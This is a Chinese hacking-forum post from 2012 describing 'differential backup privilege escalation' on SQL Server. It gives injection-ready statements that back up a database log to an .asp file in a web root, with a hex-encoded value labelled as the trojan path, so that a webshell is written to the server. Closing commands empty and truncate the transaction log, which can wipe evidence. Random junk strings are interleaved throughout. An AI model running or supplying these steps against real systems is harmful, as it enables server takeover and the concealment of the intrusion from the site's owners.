中国网络渗透测试联盟
标题:
差异备份提权
[打印本页]
作者:
admin
时间:
2012-9-15 14:38
标题:
差异备份提权
select * from master.dbo.sysdatabases 列出所有列的记录
. g( a8 W% n" o% t% [
5 h5 C; Q! }1 t' _- ` ~
select name from master.dbo.sysdatabases 仅列出name列的记录
) s6 W+ j+ |" w3 F
6 ]3 |: P# q) S4 ]
注意:可以利用log和数据库备份两上都行,log备份不成功用数据库备份
! e# n- k1 q u, ~- _6 ?) [
6 Z! W7 v4 d) I! k% y
alter database 数据库名 set RECOVERY FULL--
# ]! G! B* Y1 w1 B8 w
" X* ?1 D6 w! i/ S5 W! ^9 d
create table cmd (a image)-- \**cmd是创建的临时表
! {, B) g# a, T
2 s" \: E! ?9 Y* a" r8 z7 n
backup log 数据库名 to disk = 'f:\wwwroot\1.asp' with init--
8 g1 M$ d) f9 z- K8 T5 E4 y; V$ I
/ b0 X' P/ _/ n9 n5 }
insert into cmd(a) values (0x130a0d0a663A5CCDF8D5BE5CCDF8CDA8C6F3D2B5425C626C75656B6973735C7765625C312E6173700d0a)--
# H+ r' V) @( m- Z
& H8 x; `% V0 w5 I% d
//木马存放路径(转换16进制0x130a0d0a替换原来0x最后添加0d0a要多加几个)
% o3 r9 z" m# ]& ]3 ]2 b
% s% H! B& {7 X+ r; v; ]' F& p
backup log 数据库名 to disk = 'f:\wwwroot\1.asp'-- (要备份的目录)
. f$ k9 m9 J3 p3 R: x" j
" ?1 x B8 i( J$ N4 v. M' e
drop table cmd--
" ~$ ?6 F0 C$ p" n5 A8 w
. F, s; e* ]' Z/ U) o
- R) x! |* ^/ s4 R
f:\
2 L! j; K7 n. q
16进制转换(0x130a0d0a663A5CCDF8D5BE5CCDF8CDA8C6F3D2B5425C626C75656B6973735C7765625C312E6173700d0a)
: O* S8 L& t( l: H2 Z. J7 A0 T* b
1 l( p" n& f& S* S8 I5 \* g9 k
最好多加几个回车0d0a,要不会出错哈
3 D( p# a& x3 h D
i: \/ j7 j8 h( W. d, S. o; S0 s
7 u) C5 K, g/ R }) s5 y
SQL Server日志清空方法
; m( c _" U9 @, i- N, R
" @6 e2 X9 D5 I7 f& B, ^
在查询分析器中顺序执行以下三步,其中 databasename 为你的数据库文件名
* G, M) G5 ^' _8 }1 ?, ]' N9 r: j$ e
1.清空日志:DUMP TRANSACTION databasename WITH NO_LOG
: K, \- D1 L: Z* ]
0 R, \4 G* [7 _/ U1 W( g
2.截断事务日志:BACKUP LOG databasename WITH NO_LOG
6 u/ L S$ P+ u! h
% q$ f* r: D/ l) L
3.收缩数据库:DBCC SHRINKDATABASE(databasename)
: o; \% k2 f3 V( H$ m
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2